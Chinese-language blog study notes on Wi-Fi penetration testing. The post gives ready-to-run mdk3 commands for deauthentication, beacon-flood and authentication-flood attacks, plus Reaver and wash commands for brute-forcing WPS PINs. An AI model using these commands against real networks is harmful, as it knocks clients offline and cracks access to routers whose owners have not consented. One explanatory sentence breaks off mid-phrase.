无线渗透学习笔记2

目录

mdk3的使用

Reaver使用


mdk3的使用

mdk3是Kali自带的工具,可以发动Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,还能暴力猜解essid、802.1X 渗透测试、WIDS干扰。

Deauthentication/Disassociation Amok 强制解除认证攻击

原理是广播Deauth帧,使得

参数:

d表示调用D类测试模块,即Deauth。使用./wifi.txt的mac名单,-b黑名单,即指定攻击目标,-w白名单,即指定不攻击目标,-c设置信道,-s发射速率。该方法只能攻击特定信道的无线网络
mdk3 wlan0 d -w ./wifi.txt -c 5 -s 1000
mdk3 wlan0 d -b ./wifi.txt (攻击除白名单的所有AP)

使用wireshark抓包,发现了大量的deauth包。都是无线网卡冒充路由器发送的。

 
Beacon Flood 信号溢出攻击

制造大量无用的wifi信号干扰原信号。

参数:

b表示调用B类测试模块,即Beacon Flood。使用./wifi.txt的mac名单,-f制造名字一样的wifi名字,-a加密方式wpa2,-s发射帧速率,-c 信道
mdk3 wlan0 b -f /root/mdk3/wifi_essid.txt -a -s 1500 -c 3


或者不加参数,默认广播一堆乱码

 mdk3 wlan0 b  -a 

 

Authentication Flood认证洪水攻击

大量发送认证帧,严重的可以导致路由器瘫痪重启。自己测试过了,市面上的路由器,只要不是零几年生产的老掉牙的型号,都不会重启,已经连接的客户端网络会变卡,没有建立连接的客户端就连接不上了。

参数:

a认证洪水攻击

-a #测试指定BSSID
-m #使用有效数据库中的客户端mac地址
-c #对应 -a ,不检查是否测试成功
-i #对指定BSSID进行智能攻击
-s #速率,默认无限制
mdk3 wlan0 a –a AP的MAC地址(BSSID)

对于x-802.1X测试,1-EAPOL注销测试企业级的路由器才用得上。

Reaver使用

reaver用在无线渗透上能用到的功能也就是pin码破解。

WPS(Wi-Fi Protected Setup,WiFi保护设置),是由WiFi联盟组织实施的认证项目,其主要目的是用来简化无线网络的安全加密配置。而PIN码是WPS的一种验证方式,相当于无线WiFi的密码。

先侦听信道

方法1:wash -i wlan0mon -c 11#启动侦听,发现支持WPS的AP,-c指定信道11

方法2:airodump-ng wlan0mon --wps #抓包

找到支持WPS功能的路由器
reaver -i wlan0mon -b 14:75:20:21:75:55 -vv -c 11#爆破PIN码,-b指定AP的MAC,-vv说明详细显示信息
reaver -i wlan0mon -b 14:75:20:21:75:55 -vv -c 11 -K 1 #针对有漏洞的,秒破,可以先尝试
reaver -i wlan0mon -b 14:75:20:21:75:55 -vv -c 11 -p 88888888 #-p指定PIN码

 

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值